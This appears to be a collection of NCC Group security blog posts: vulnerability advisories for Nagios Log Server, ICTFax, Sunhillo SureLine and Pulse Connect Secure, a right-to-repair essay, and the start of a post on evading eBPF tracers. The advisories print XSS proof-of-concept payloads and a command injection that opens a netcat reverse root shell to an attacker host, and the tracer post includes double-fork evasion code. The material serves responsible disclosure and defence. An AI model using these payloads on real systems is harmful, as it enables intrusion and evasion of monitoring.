  • 97030f3c81906334429afebbf365a89b66804ed890cd74038815ca18823d626c
  • 9b55b35284346bbcdc2754e60517e1702f0286770a080ee6ff3e7eed1cab812a
  • 9f9315790d0b0cc5213ac9a8eff0968cccc0a6c469b50d6598ce759748fe74bf
  • 9f9ebd6cd9b5b33ab2780122ee9c5feec84927f362890a062d13ef9816c7b85f
  • a0050c33c8263da02618872d642617959b3564fe173985e078bfedb89df93724
  • aa97f4f98ff842b1bfd78e920fcb1dedaec3f882dd19311bba6037430868e7a7
  • ad2dd8a68ce22d0959f341e9269e8033b34362b34bdea50b8ee2390907f1a610
  • b2cd9cca011064d03ddd8fe3521ce0e9f9d8b16f63e4ecaf03eacfef47d22dbf
  • b7516dca419d087ef844c42e061a834908f34e7363577ab128094973896222c8
  • b847e717215e0198cb4e863bd96390613f83eb92693171be50ca14255c5fb088
  • bbc58fd69ce5fed6691dd8d2084e9b728add808ffd5ea8b42ac284b686f77d9a
  • bfb4603902c6c9ff32bc36113280ee8b5687cc3ef4c0ff9fc56f2925c7f342f0
  • c0e74f565237c32989cb81234f4b5ad85f9dd731c112847c0a143d771021cb99
  • c2f23ad4e2f12c490cfd589764464e293d5d56c31b6b3f5081e2d677384cb2fe
  • c95af9eb52111b72563875d85d593d96d7e54e19690827a052377c77cc80e06f
  • caa0d9bb7ed2d21a76b71dfc22ffaef80371de8af2a03b8103cbcec332897a88
  • d0e1639e6386ef3c063bfae334fcc35cdfa85068ac1a65bb58f2463276c31ac9
  • d1ac4d07ba6fe1dd988c471975e49e35b83d03a9b9d626fa524fd8300b80b14a
  • d4335f4189240a3bcafa05fab01f0707cc8e3dd7a2998af734c24916d9e37ca8
  • d60fdabaf5a0ab375361d2ed1a9b39832bdb8bd33466d6c43d42a48ba2ffd274
  • e0afb8b937a5907fbe55a1d1cc7574e9304007ef33fa80ff3896e997a1beaf37
  • e2449ccc74e745c0339850064313bdd8dc0eff17b3a4e0882184c9576ac93a89
  • e8e7f2f889948fd977b5941e6897921da28c8898a9ca1379816d9f3fa9bc40ff
  • edc6e32e3545f859e5b49ece1cabd13623122c1f03a2f7454a61034b3ff577ed
  • ee6d0d0ea24be622521ee1a4defa5d5729b99ee2217ac65701d38d05dbc0d4e6
  • f1718a005232d1261894b798a60c73d971416359b70d0e545d7e7a40ed742b71
  • f83c357106a7d1d055b5cb75c8414aa3219354deb16ae9ee7efe8ee4c8c670ca
  • fd8a5313bf63f5013dc126620276fb4f0ef26416db48ee88cbaaca4029df1d73

Additional Reading

Technical Advisory: Stored and Reflected XSS Vulnerability in Nagios Log Server (CVE-2021-35478,CVE-2021-35479)

22 July 2021 at 05:35
Vendor: Nagios
Vendor URL: https://www.nagios.com/
Versions affected: >= 2.1.8
Systems Affected: Nagios Log Server
Author: Liew Hock Lai <[email protected]>
Advisory URL: https://www.nagios.com/downloads/nagios-log-server/change-log/ 
CVE Identifier: CVE-2021-35478 (Reflected XSS), CVE-2021-35478 (Stored XSS)
Risk: 4.6 (CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:N) (client-side script execution)

Summary

Nagios Log Server is a Centralized Log Management, Monitoring, and Analysis software that allows organizations to monitor, manage, visualize, archive, analyse, and alert on all of their log data. Version 2.1.8 of the application was found to be vulnerable to Stored and Reflected XSS.

This occurs when malicious JavaScript or HTML code entered as input to a web application is stored within back-end systems, and that code is later used in a dynamically-generated web page without being correctly HTML-encoded.

Impact

The XSS could facilitate attackers in executing malicious JavaScript on victim machines such as stealing cookies or redirecting users.

Details

Reflected XSS

The time, start, end, type and search parameter in the audit log and alert history page is vulnerable to Reflected XSS.

An example URL of the vulnerable page is the following:

GET /nagioslogserver/admin/audit-log?time=24h&start=&end=&type=&search= HTTP/1.1

As a proof of concept, an alert box can be generated with the following payload:

GET /nagioslogserver/admin/audit-log?time=24h"><script>alert(1)</script>&start=&end=&type=&search= HTTP/1.1

Proof of concept:

Stored XSS

The pp parameter for results per page in the audit log and alert history page is vulnerable to Stored XSS.

An example URL of the vulnerable page is the following:

POST /nagioslogserver/admin/audit-log HTTP/1.1

As a proof of concept, an alert box can be shown with the following payload:

POST /nagioslogserver/admin/audit-log HTTP/1.1

Host: 192.168.1.223
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 45
Origin: http://192.168.1.223
Connection: close
Referer: http://192.168.1.223/nagioslogserver/admin/audit-log
Cookie: csrf_ls=b782f760bdac44ce7471725aac3882e2; ls_session=c4tv62aqvq8deo92lmalloule04bob2i
Upgrade-Insecure-Requests: 1

csrf_ls=b782f760bdac44ce7471725aac3882e2&pp=1"><script>alert(1)</script>

Proof of concept

Recommendation

Upgrade to Nagios Log Server 2.1.9.

Vendor Communication

2021-06-19 Advisory reported to Nagios
2021-06-21 Nagios received and started to track the security vulnerabilities
2021-06-24 Nagios fixed the issue on version 2.1.9
2021-07-20 Nagios released the patch
2021-07-22 Technical Advisory published by NCC Group 

About NCC Group

NCC Group is a global expert in cybersecurity and risk mitigation, working with businesses to protect their brand, value and reputation against the ever-evolving threat landscape. With our knowledge, experience and global footprint, we are best placed to help businesses identify, assess, mitigate & respond to the risks they face. We are passionate about making the Internet safer and revolutionizing the way in which organizations think about cybersecurity.

Published date: 22 july 2021

Written by:  Liew Hock Lai

Technical Advisory – ICTFAX 7-4 – Indirect Object Reference

22 July 2021 at 22:15
Vendor: ICTFAX
Vendor URL: https://www.ictfax.org
Versions affected: ICTFax Version 4.0.2
Author: Derek Stoeckenius

Summary

ICTFax is fax to email software maintained by ICTInnovations. In version 7-4 of this product, available through the CentOS software repository, an indirect object reference allows a user of any privilege level to change the password of any other user within the application – including administrators. 

Impact

Successful exploitation of this vulnerability can allow a low-privilege user to access both administrative functions and user data from arbitrary users within the application.

Details

The application does not require the user to re-enter a password to change passwords within the application. The application uses sequential numbering to refer to users within the application for the purposes of altering passwords. 

To replicate this issue:

1. Login to the application as a “user”

2. Replace the [bearer token] with a valid token from an authenticated user

3. Alter the [usernumber] field to a valid numerical user within the application. 

Recommendation

ICTFax should require a user re-enter a password before making password changes within the application.

Vendor Communication

4/12/21 NCC Group made initial contact with ICT Innovations via their ticket system
4/13/21 Ticket assigned
4/16/21 NCC Group requested that communication continues via secure comms
4/23/21 ICT Innovations response asking NCC to email a head developer
4/27/21 NCC emails the head developer letting them know we would like to start a disclosure
5/1/21 No response from ICT Innovations so NCC opens up the original ticket requesting direction from ICT Innovations
6/1/21 No response from the ticket system so NCC reach's out to head developer again explaining that NCC would like to start a disclosure, citing our disclosure policy 
7/7/21 NCC reaches out to ICT Innovations via email and their ticketing system, and informs them that we intend to publish the advisory on our blog in one week 
7/22/21 Advisory published

About NCC Group

NCC Group is a global expert in cybersecurity and risk mitigation, working with businesses to protect their brand, value and reputation against the ever-evolving threat landscape. With our knowledge, experience and global footprint, we are best placed to help businesses identify, assess, mitigate & respond to the risks they face. We are passionate about making the Internet safer and revolutionizing the way in which organizations think about cybersecurity.

Published date:  July 22 2021
Written by: Derek Stoeckenius

Practical Considerations of Right-to-Repair Legislation

23 July 2021 at 15:02

Background

For some time there has been a growing movement amongst consumers who wish to repair their own devices in a cost effective manner, motivated to reduce their expenses, and reduce e-waste. This is becoming ever more difficult to achieve as devices reach ever higher levels of complexity, and include more electronics and firmware. The difficulty is exacerbated when OEMs make the information, parts, and tools necessary for repairs only available to their own authorized repair centers, policies which have been described as predatory.

Fundamentally, much of the conflict appears to arise from the distinction between the distribution models of traditional goods and digital goods. Historically, if you buy an item like a car you are free to do with it what you like, including re-selling, repairing with original or after-market parts, and generally modifying as you see fit. For digital goods like software this is not typically the case. Instead the purchaser will only acquire a license to use the software rather than any ownership stake that would permit them the same capabilities as a traditional purchase. The line between these cases has now become very blurred as much of what we buy contains computers and software. So while you may own your modern car or smartphone, the many millions of lines of code within it you almost certainly do not.

There have been several prominent cases at the forefront of the debates that are worth mentioning for additional context.

  • John Deere, a popular manufacturer of farming equipment, has been in a battle against farmers who want tools and software to be made available so that they can repair their own machines without expensive service calls.
  • Apple similarly makes authorized repairs only available at their own (often inconveniently located) stores and has repeatedly lobbied against right to repair legislation. 
  • McDonald’s too is embroiled in a scandal where they’re preventing franchisees from using 3rd party diagnostic tools to keep the ice cream machines in working order, which is an expensive challenge preventing 5-16% of all McDonald’s restaurants from selling ice cream at any given time. 

Owner Perspective

The benefit to owners is somewhat obvious. Being able to repair their devices allows them to save money, to learn how the technology works, to innovate new uses for things, and gives them freedom of choice. The cost of repairs when using name brand repair shops has always been much higher than the independent shops. This is a long established truth most evident in the auto repair industry. We see this mirrored in other industries, as anyone who’s had to fix a broken iPhone can attest. The ability to modify a system has been a crucial part of the story of innovation. So many of our modern gadgets owe their existence to the improvements built upon the previous generations of technologies.

OEM Perspective

Depending on the industry and the device, repair services can account for a significant portion of the OEMs revenue. While Apple claims to actually lose money on iphone repairs, about half of the US automotive market’s $1.2 trillion revenue is generated from aftermarket part sales. Other industries and other OEMs will fall somewhere on this profitability spectrum. But while profit can be an important factor in restricting repair capabilities, it’s not the only one.

Most OEMs correctly take their responsibility for the security of their users very seriously. This is not only good business, it’s a legal requirement, and failing to protect the security of user devices can bring very serious penalties. To that end, OEMs implement a plethora of security features in their devices that are intended to lock out would-be attackers. Attackers come in many varieties, from the opportunistic, who scan the Internet for vulnerable systems, to the very targeted, who may attempt to compromise a device physically. In some cases, the user themselves is considered an attacker, as is the case for most entertainment devices. Here, the content providers are a stakeholder in the device security story and contractually require that their assets be protected from the users.

Finally, modern devices are rarely built and put to market without an extensive array of technology suppliers. Frequently an OEM has supply arrangements that are bound by highly restrictive contract terms which may prevent the public disclosure of the vendor’s intellectual property. This can include source code, reference schematics, datasheets, software tools, and other information that may be necessary for the effective repair of some types of defects. The OEM may simply not have the legal rights to release the required information.

US Federal Legislation

In the US, and around the world, various governments have proposed (largely unsuccessful) legislation to address the repair controversy. Various states have also attempted unsuccessfully to introduce similar legislation in the past. Most recently, a US presidential executive order was issued tasking the FTC with enacting new rules for OEMs in this regard. At about the same time, a new bill was introduced to congress with the same purpose, the text of which is now available as the Fair Repair Act. Over the coming days and weeks there will be a significant amount of ink given to interpreting the recently published text. The key highlights of the proposed legislation include the following:

  • (Section 2.a) Electronic OEMs must make documentation, parts, and tools available for owners and independent repair providers. This includes making firmware available for public download. 
  • (Section 5.3) Also included is “reporting output” which is not defined in the text. We assume this means logs or similar, which may contain sensitive information.
  • (Section 5.5) The OEM must make these materials available under timely and reasonable terms. Reasonable terms must not include substantial obligation or restrictions.
  • (Section 3) Enforcement will be delegated to the FTC, and any FTC actions and intervention will take priority over possible actions by lower levels of government.
  • (Section 4.1) Security related functions are explicitly not excluded.
  • (Section 4.2) If trade secrets need to be divulged to comply, then so be it.
  • The proposal explicitly does not apply to:
    • (Section 4.4) motor vehicles (a term not defined in the text, but from other documents we conclude that tractors and farm machinery ARE covered by the rules)
    • (Section 4.5) medical devices (already subject to FDA definitions and regulation).
  • (Section 5.4, 5.6) Embedded software is defined as “programmable instructions”, but this itself is vague and undefined and warrants further discussion.
  • (Section 5.12) Tools may include software.
  • (Section 6) If passed, this legislation takes effect in 60 days.

Implementation Thoughts

Device security is a balancing act. There are often trade-offs and compromises with usability, performance, cost, and of course repairability. Here we discuss some specific implications of the proposed legislation and how an OEM might alter their designs to comply.

Minimum Repairable Unit

The biggest question that remains unanswered in the legislation text, is what the minimum repairable unit should be. Swapping out an entire ECU module on a tractor is a straightforward repair for pretty much anyone with the right screwdriver. But what about deeper levels of granularity? Can single components within the ECU be replaced? What about fixes deep within a semiconductor device? What about software bugs? Obviously all of this can be fixed by the owners with the right tools, skills, and instructions, but how deep into the technology stack will the legislation apply? In the extreme, consider that a modern CPU can contain thousands of internal computing elements all of which contain firmware that theoretically contain bugs to be repaired. Will the legislation require releasing the details of every transistor in the chip? This uncertainty is likely driving a lot of the resistance we see from the OEMs.

A layman’s interpretation of the legislation is that the minimum repairable unit is below the PCB level. Schematics are explicitly included in the list of information OEMs must provide, and so one would assume that users may be permitted to diagnose which component on the PCB has failed and replace it. For now it seems that the OEMs are left to interpret where they will draw the line for what is and is not repairable, and security must now be part of that discussion more than ever.

Security Mechanisms

There are certainly security features within devices that are intended to prevent attackers from compromising the device, its data, or its users. Each security mechanism that could be an obstacle for repair needs to be evaluated on a case-by-case basis to determine the best course of action for compliance.

Section 4.1 is interesting in its vagueness. One would assume that this is intended to address cases where passwords or authentication tokens are needed in order to conduct the repairs and bring the device back to a functional state. But additionally we should assume this is intended to address cases where security functionality intended to protect the device from attackers may prevent certain repairs, as exemplified by the iPhone button replacement situation from 2016 that caused devices repaired with third party buttons to stop functioning.

As one specific example, secure devices often will use a secure device identity that is represented as a combination of the components within the device. Information from each security impacting component is collected and cryptographically combined to create a value that represents the sum of all the parts. This value is cryptographically signed by the OEM (using a signing server or signing oracle) at manufacturing time to ensure that it cannot be tampered with by an attacker seeking to subvert the security of one or more components that may be vital to the security of the overall device. This signed value is then used for things like device identity, encryption of secrets, and other foundational security functionality. Any material change in the makeup of the security related components of the device will invalidate this value or its signature, and thus be detectable (most likely manifesting as an early boot failure). To allow authorized replacement of a component in a system such as this requires that the original pairing operation be performed again, along with the signing step. Because the signature generation is a security sensitive operation, only authorized users would typically be granted such permissions in order to prevent abuse by attacking user devices, creating counterfeits, and laundering stolen devices. 

Under the proposed rules, such a signing oracle would need to be made available to owners and independent repair operators, which may then enable the very attacks that the system was designed to prevent. Section 4.1 clearly covers such functionality, which may result in a significant degradation of device security if implemented poorly.

A reasonable (but unfortunately uncommon) approach here is to perform a two stage authentication, where both the OEM and the owner are required to authorize the bypass of the security mechanism. This allows neither party to bypass without the other’s approval. The caveat here is that as an industry we have yet to find a reliable way to support owner authentication that does not allow (or even encourage) poor security practices such as default or weak passwords.

Secure Boot

Software and firmware is listed in the proposed legislation, but described simply as “programmable instructions”. It is unclear if this affects all programmable instructions within the device, all the way down to the many embedded ROMs within the silicon, or if the line will be drawn at the firmware (which is specifically mentioned). Furthermore, it is unclear if the intent is to allow the owner source code access such that they may fix software bugs, or merely binary images so they can reflash devices with the original OEM provided code. The latter is relatively common already, as any mature and responsible OEM is already making ongoing firmware updates available to provide security patches for connected devices. The former on the other hand, comes with additional complications. Most firmware integrity measures, such as secure boot, rely on cryptographic signatures applied to the firmware image. Verification of the signature at boot time prevents attackers from persistently compromising the device. Such features have been seen for more than 2 decades in smartphones, and is now considered a table-stakes defense for any modern connected device. The complication here is that the cryptographic signature is only useful if the private key remains secret. If owners are expected to be able to modify the firmware then the key will need to be shared, revealing it to attackers, and thus eliminating this important security defense entirely. It is unclear if Section 4.1 (security functions) and 4.2 (trade secrets) of the proposed legislation are intended to cover this particular case, but a conservative reading should probably assume they do. Two possible implementation solutions to this are:

  1. Provide unique signing keys for each individual device, and an authorization system that permits only the current owner of a system from accessing or using these private keys. This is a level of infrastructure burden many OEMs today are not likely prepared for.
  2. Allow the owner to provide their own signing key. Emerging proposals exist (OCP, IBM) in some domains to allow the cryptographic transfer of ownership by replacing the signing key in a system with one of the owner’s choosing. Hardware support for this is rare, but does exist in some components. Unofficial partial support in Android also exists.

Neither solution above is commonly implemented today and would require extensive changes deep within the system, requiring new hardware and firmware to be designed and tested. Bound by dependencies in current hardware and semiconductor designs, it is doubtful that such changes could be rolled out in the proposed 6 month implementation deadline.

Authentication

The difficulty for OEMs here is best illustrated by a concrete example: All phones contain a unique identifier that allows the network to address them individually. For phones on 3GPP networks this is the International Mobile Equipment Identity (IMEI). The IMEI is programmed by the OEM during manufacturing, and is typically allocated on a per network carrier basis. Repurposing phones from one carrier to another (during repair, or manufacturing rework) may require replacing the IMEI, and such functionality is therefore a practical necessity that OEMs implement for their own internal use. But because it is illegal to alter the IMEI in some jurisdictions, this repair functionality is tightly restricted to only OEM authorized individuals. 

There are many examples of similar functionality where through regulation, contractual obligations, liability, safety, security, etc, certain privileged functionality cannot be exposed to users or owners. From this standpoint, the proposed legislation will necessarily create multiple tiers of authorized repair. Some OEMs implement this sort of granular authentication capability already, separating permissions for internal OEM development, internal manufacturing, external repair, and owner capabilities, but this is not a common feature. Implementing the core firmware functionality and the infrastructure necessary to support it is non-trivial, and unlikely to meet the proposed 60 day implementation deadline.

End of Life

End of life is a challenge as recent public cases highlight. A vulnerability in a Western Digital product is a case study of what happens when internet connected products continue to be used past EOL. SonicWall had a similar incident recently as well.

Attacker techniques and tools improve over time. As software ages, ever more vulnerabilities will be discovered in it. The standard practice is therefore to continually release updated software and firmware versions, preferably at a regular cadence. Automatic updates remove the need for owners to be involved in this vital (but tedious) maintenance, and is thus becoming a common feature in many devices.

In the WD case, they had previously declared the product model as EOL in 2015 and have provided no firmware updates to patch known vulnerabilities since that time. There were multiple critical vulnerabilities including remote root command injection and a remote unauthenticated factory reset function. The latter is being actively exploited in the wild to destroy customer data, leaving WD in an uncomfortable position. 

What happens when the product is no longer commercially viable for the OEM to support? It may still have decades of useful life, and thus support is clearly needed. For consumer devices the most common relationship model is that the customer pays a single up front cost, and the vendor provides binary-only firmware updates for free, for a time. Under this model, obviously it’s impractical for a company to support products in the field forever, and the customer is incapable of providing their own patches. This leaves a few options:

  1. Offer customers a support plan. Like an annual subscription fee that funds the ongoing maintenance of the product and it’s firmware. For customers who depend on the product, they may be willing to pay. This support concept is well established for enterprise products already.
  2. Disable remote features upon reaching a clearly communicated EOL date. While such an attack surface reduction is responsible to the safety of the internet as a whole, this is not likely to thrill individual customers who may be reliant on that functionality. This path was taken by Sonos which caused significant unrest among owners.
  3. Require owners and users to explicitly accept the risk of running obsolete technology in an unsafe unmaintained fashion. There is an obvious difficulty of properly communicating this to the owners in a way that let’s them make informed decisions (i.e. not all consumers are equally literate with technology).
  4. Turn it over to the community to allow maintenance to continue. Many companies open source their products when they are no longer commercially viable and this allows owners and hobbyists to continue the maintenance. This may require releasing firmware signing keys, and may require permissive licenses for any third party components. This assumes of course that the OEM still has all these artefacts, as maintaining digital information for decades poses its own challenges. Here Escrow solutions exist that can help.

Regardless of the chosen solution, clear communication to the owners of the expected EOL date of the product, and in particular the security expiration date, is a must.

Timelines

The proposed 60 day implementation is significantly out of sync with typical product development timelines. For most electronic devices, the typical product development cycle can take 6-12 months, and this assumes relatively simple iteration on previous designs. For products that contain more fundamental improvements, it can take years. For complex semiconductor products, development cycles can easily be 10 years or more. 

This discrepancy makes compliance on new products very challenging, considering the foundational nature of the changes that may be required to comply without adversely affecting the security of the users (by, say unintentionally releasing dangerous tools). Even conceptually simple tasks such as scrubbing firmware log statements to remove sensitive information can be quite time consuming.

Moreover, nothing in the proposal indicates that this is to be applicable to new products only. Implementation on existing products is assumed, and this may require even more drastic actions by the OEM (such as the severely unsafe option of releasing code signing keys to both owners and attackers).

The proposed timeline is therefore expected to generate significant pushback from the OEMs. A better approach would have been to phase in the changes over a number of years, and grandfather existing products which may be uneconomical or technically impossible to support.

Closing Thoughts

It is abundantly clear that the right to repair movement is here to stay. Having visible support from the current US federal administration gives it some real momentum that is unwise to ignore. We recommend that OEMs begin working on solutions to comply sooner rather than later, because even if the current proposal does not pass into law, there will be others, and eventually compliance in one form or another, in some jurisdiction, is likely to be required. Having a low-friction compliance plan will become ever more important in the years to come.

Technical Advisory – Sunhillo SureLine Unauthenticated OS Command Injection (CVE-2021-36380)

26 July 2021 at 15:28
Vendor: Sunhillo 
Vendor URL: https://www.sunhillo.com/ 
Versions affected: SureLine <= 8.7.0 
Systems Affected: Any using SureLine 
Author: Liam Glanfield <[email protected]> 
Advisory URL / CVE Identifier: CVE-2021-36380 
Risk: Critical - complete compromise of the host

Summary

Sunhillo is an industry leader in surveillance data distribution. The Sunhillo SureLine application contained an unauthenticated operating system (OS) command injection vulnerability that allowed an attacker to execute arbitrary commands with root privileges. This would have allowed for a threat actor to establish an interactive channel, effectively taking control of the target system.

Impact

Complete system compromise. With the threat actor in full control of the device they could cause a denial of service or utilise the device for persistence on the network.

Details

The /cgi/networkDiag.cgi script directly incorporated user-controllable parameters within a shell command, allowing an attacker to manipulate the resulting command by injecting valid OS command input. The following POST request injects a new command that instructs the server to establish a reverse TCP connection to another system, allowing the establishment of an interactive remote shell session.

The script did appear to validate user input and blocked most techniques for OS command injection. Additionally, the request also did not require any authentication (session cookie etc.). However, command injection was still possible using $(), thus enabling arbitrary commands to be run within the parenthesis.

The following parameters were affected:

  • ipAddr
  • dnsAddr

The following lines demonstrate the creation of a reverse connection to an attacker’s host, leading to the establishment of a covert channel, effectively allowing an attacker to execute commands on the server. The installed ‘nc’ package (Netcat) is used to create a reverse connection to an attacker’s host (192.168.1.2) on port TCP/8181 while redirecting all traffic (stdout and stderr) to and from the /bin/bash shell.

POST /cgi/networkDiag.cgi HTTP/1.1 
Host: 192.168.1.1 
Content-Length: 145 

command=2&ipAddr=&dnsAddr=$(nc+e+/bin/bash+192.168.1.2+8181)&interface=0&netType=0&scrFilter=&dstFilter=&fileSave=false&pcapSave=false&fileSize=

The code above would send the shell to an attacker’s host, which in this case should have port 8181 on listening mode. This was compounded further by the web service running as root and with an interactive shell now established, the system would be in full control of the attacker. For example the attacker could add a SSH public key into /home/root/.ssh/authorized_keys and gain access as the root user.

Recommendation

Update Sunhillo SureLine to version 8.7.0.1.1.

Vendor Communication

NCC Group Notifies Vendor: 21st June 2021 
Vendor Replies Requesting More Details: 21st June 2021 
NCC Group Sends Requested information: 21st June 2021 
Vendor Confirms The Vulnerability: 28th June 2021 
NCC Group Requests a Patch Date: 28th June 2021 
Vendor Response With Date: 7th July 2021 
Patch Published: 22nd July 2021 
Advisory Published: 26th July 2021

Thanks to

Liam Glanfield at NCC Group

About NCC Group

NCC Group is a global expert in cybersecurity and risk mitigation, working with businesses to protect their brand, value and reputation against the ever-evolving threat landscape. With our knowledge, experience and global footprint, we are best placed to help businesses identify, assess, mitigate & respond to the risks they face. We are passionate about making the Internet safer and revolutionizing the way in which organizations think about cybersecurity.

Publish Date: 7/26/2021

Written by: Liam Glanfield

Technical Advisory: Pulse Connect Secure – RCE via Uncontrolled Archive Extraction – CVE-2021-22937 (Patch Bypass)

5 August 2021 at 15:59
Vendor: Ivanti Pulse Secure
Vendor URL: https://www.pulsesecure.net/
Versions affected: Pulse Connect Secure (PCS) 9.11R11.5 or below
Systems Affected: Pulse Connect Secure (PCS) Appliances
Author: Richard Warren <richard.warren[at]nccgroup[dot]trust>
Advisory URL: https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44858
CVE Identifier: CVE-2021-22937
Risk: 7.2 CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

Summary

The Pulse Connect Secure appliance suffers from an uncontrolled archive extraction vulnerability which allows an attacker to overwrite arbitrary files, resulting in Remote Code Execution as root.

This vulnerability is a bypass of the patch for CVE-2020-8260.

Impact

Successful exploitation of this issue results in Remote Code Execution on the underlying Operating System with root privileges. An attacker with such access will be able to circumvent any restrictions enforced via the web application, as well as remount the filesystem, allowing them to create a persistent backdoor, extract and decrypt credentials, compromise VPN clients, or pivot into the internal network.

Details

The Pulse Connect Secure appliance suffers from an uncontrolled archive extraction vulnerability which allows an attacker to write executable files within the /home/runtime/tmp/tt/ directory, resulting in Remote Code Execution. PCS allows administrative users to import archived configurations. These configurations are compressed using GZIP and encrypted using a hardcoded key, allowing the attacker to encrypt and decrypt their own crafted archive files. When these archives are imported via the administrative GUI, extraction takes place in an unsafe manner, leading to arbitrary file (over)write.

Whilst this issue was patched by adding validation to extracted files, this validation does not apply to archives with the “profiler” type. Therefore, by simply modifying the original CVE-2020-8260 exploit to change the archive type to “profiler”, the patch can be bypassed, and code execution achieved.

Root Cause Analysis

In October 2020, Pulse Secure released PCS version 9.1R9, which patched the CVE-2020-8260 vulnerability. The patch added a new function named DSConfig::validateTarFile. When archives are imported via the DSConfig::importConfigImpl, the contents of the uploaded config archive are listed using the tar -tvf command, and placed into a file named /tmp/filelist. The function validateTarFile is then called, providing a list of safe files, which should be expected inside an uploaded archive.

The validateTarFile function parses the output in /tmp/filelist, and ensures:

  • The archive does not contain any symlinks or hardlinks.
  • The archive contains only the expected files
  • No files contain ../ in their name.

This added check prevented exploitation of CVE-2020-8260.

In May 2021, Ivanti released PCS version 9.1R11.4, which addressed a number of vulnerabilities which had been exploited in-the-wild. According to the release notes, a vulnerability which sounded very similar to CVE-2020-8260 was also addressed:

Diffing PCS versions 9.1R10 and 9.1R11.4 we could see that calls to DSConfig::checkTarSafe had been added to a number of CGI files:

This additional validation was added to the following CGIs:

  • /dana-admin/cert/clientauthcert.cgi
  • /dana-admin/cert/admincert.cgi
  • /dana-admin/mobile/smimeCert.cgi

Just like the check in DSConfig::importConfigImpl, the checkTarSafe function first lists the files within the uploaded archive, before calling validateTarFile

From this we could identify that CVE-2020-22900 was a variant of CVE-2020-8260. By changing the original exploit to POST to these CGI files instead, we could achieve code execution on PCS < 9.1R11.4.

Due to the existence of these variants within the import feature(s), we thought it would be a good idea to carry out further variant and patch analysis see if it was still possible to exploit the extraction vulnerability elsewhere.

Reviewing the code within import.cgi, we could see that config imports are processed via DSConfig::importConfig, which is passed the uploaded file-path and some other options, including the archive type:

 Within importConfig, we could see that it either calls importConfigImpl, or importProfilerDatabase, depending on the archive type supplied by the user:

As demonstrated earlier, importConfigImpl contains a call to validateTarFile, however importProfilerDatabase did not contain this check before the tar -C command is executed:

Therefore, by changing the uploaded archive type to “profiler”, the patch for CVE-2020-8260 could be bypassed.

Proof of Concept

A Proof of Concept was developed to achieve Remote Code Execution as the root user, simply by changing a single POST parameter variable in the original CVE-2020-8260 exploit.

Recommendation

Upgrade to Pulse Connect Secure (PCS) 9.1R12, or later.

Vendor Communication

2021-05-12 – Reported to Pulse Secure via HackerOne.
2021-05-13 – Acknowledgement of submission from HackerOne received - awaiting triage.
2021-05-25 – Requested an update via HackerOne - no response.
2021-06-22 – Confirmed that the exploit still works on newly released PCS 9.1R11.5 version. Shared a screenshot via HackerOne ticket and requested a further update - no response.
2021-07-15 – Emailed Ivanti/Pulse Secure PSIRT & updated HackerOne ticket informing them that the vulnerability will be publicly disclosed on 2021-07-23, as per our disclosure policy (if a vendor is unresponsive).
2021-07-15 – Reply received from Ivanti PSIRT via email. Requested that we hold off disclosure and requested further details of the vulnerability (due to lack of access to HackerOne).
2021-07-15 – Vulnerability details shared with Ivanti PSIRT via PGP email.
2021-07-20 – Ivanti PSIRT confirm they were able to verify the report and plan to release a fix by August 2nd.
2021-07-20 – We agree to hold off disclosure until after the updated version is released.
2021-07-31 – Ivanti confirm the fix will be released in PCS 9.1R12, which is scheduled for August 2nd, and request that we don’t publish the advisory until August 5th.
2021-08-02 – Pulse Connect Secure 9.1R12 released.
2021-08-05 – Advisory published.

About NCC Group

NCC Group is a global expert in cybersecurity and risk mitigation, working with businesses to protect their brand, value and reputation against the ever-evolving threat landscape. With our knowledge, experience and global footprint, we are best placed to help businesses identify, assess, mitigate & respond to the risks they face. We are passionate about making the Internet safer and revolutionizing the way in which organizations think about cybersecurity.

Published date:  2021-08-05

Written by:  Richard Warren

Some Musings on Common (eBPF) Linux Tracing Bugs

6 August 2021 at 04:54

Having been in the game of auditing kprobe-based tracers for the past couple of years, and in light of this upcoming DEF CON on eBPF tracer race conditions (which you should go watch) being given by a friend of mine from the NYU(-Poly) (OSIR)IS(IS) lab, I figured I would wax poetic on some of the more amusing issues that tracee, Aqua Security’s “Runtime Security and Forensics” framework for Linux, used to have and other general issues that anyone attempting to write a production-ready tracer should be aware of. These come up frequently whenever we’re looking at Linux tracers. This post assumes some familiarity with writing eBPF-based tracing tools, if you haven’t played with eBPF yet, consider poking around your kernel and system processes with bpftrace or bcc.

tl;dr In this post, we discuss an insecure coding pattern commonly used in system observability and program analysis tools, and several techniques that can enable one to evade observation from such tools using that pattern, especially when they are being used for security event analysis. We also discuss several ways in which such software can be written that do not enable such evasion, and the current limitations that make it more difficult than necessary to write such code correctly.

fork(2)/clone(2) et al Considered Harmful

As we’ve mentioned before,1 one does not simply trace fork(2) or clone(2) because the child process is actually started (from a CoW snapshot of the caller process) before the syscall has actually returned to the caller. To do so would be a problem, as any tracer that waits for the return value of fork(2)/clone(2)/etc. to start watching the PID will invariably lose some of the initial operations of the child >99% of the time. While this is not a “problem” for most applications’ behavior, it becomes troublesome for monitoring systems based on following individual process hierarchies live instead of all processes globally, retroactively, as anyone can simply “double-fork” in rapid succession to throw off the yoke of inspection, since the second fork(2) will be missed ~100% of the time (even when implementing the bypass in C).

// $ gcc -std=c11 -Wall -Wextra -pedantic -o double-fork dobule-fork.c
// $ ./double-fork <iterations> </path/to/binary>
#include <stdlib.h>
#include <stdio.h>
#include <sys/types.h>
#include <unistd.h>

int main(int argc, char** argv, char** envp) {
  if (argc < 3) {
    return 1;
  }

  int loop = atoi(argv[1]);

  for (int i=0; i < loop; i++) {
    pid_t p = fork();
    if (p != 0) {
      return 0;
    }
  }

  return execve(argv[2], &argv[2], envp);
}
/tracee/dockerer/tracee.main/dist # ./tracee --trace process:follow --filter pid=48478 -e execve -e clone
TIME(s)        UID    COMM             PID     TID     RET              EVENT                ARGS
111506.067379  0      bash             0       0       50586            clone                flags: CLONE_CHILD_CLEARTID|CLONE_CHILD_SETTID, stack: 0x0, parent_tid: 0x0, child_tid: 0x7F56929630BF, tls: 0
111506.069569  0      bash             0       0       0                execve               pathname: ./double-fork, argv: [./double-fork 100 /usr/bin/id]
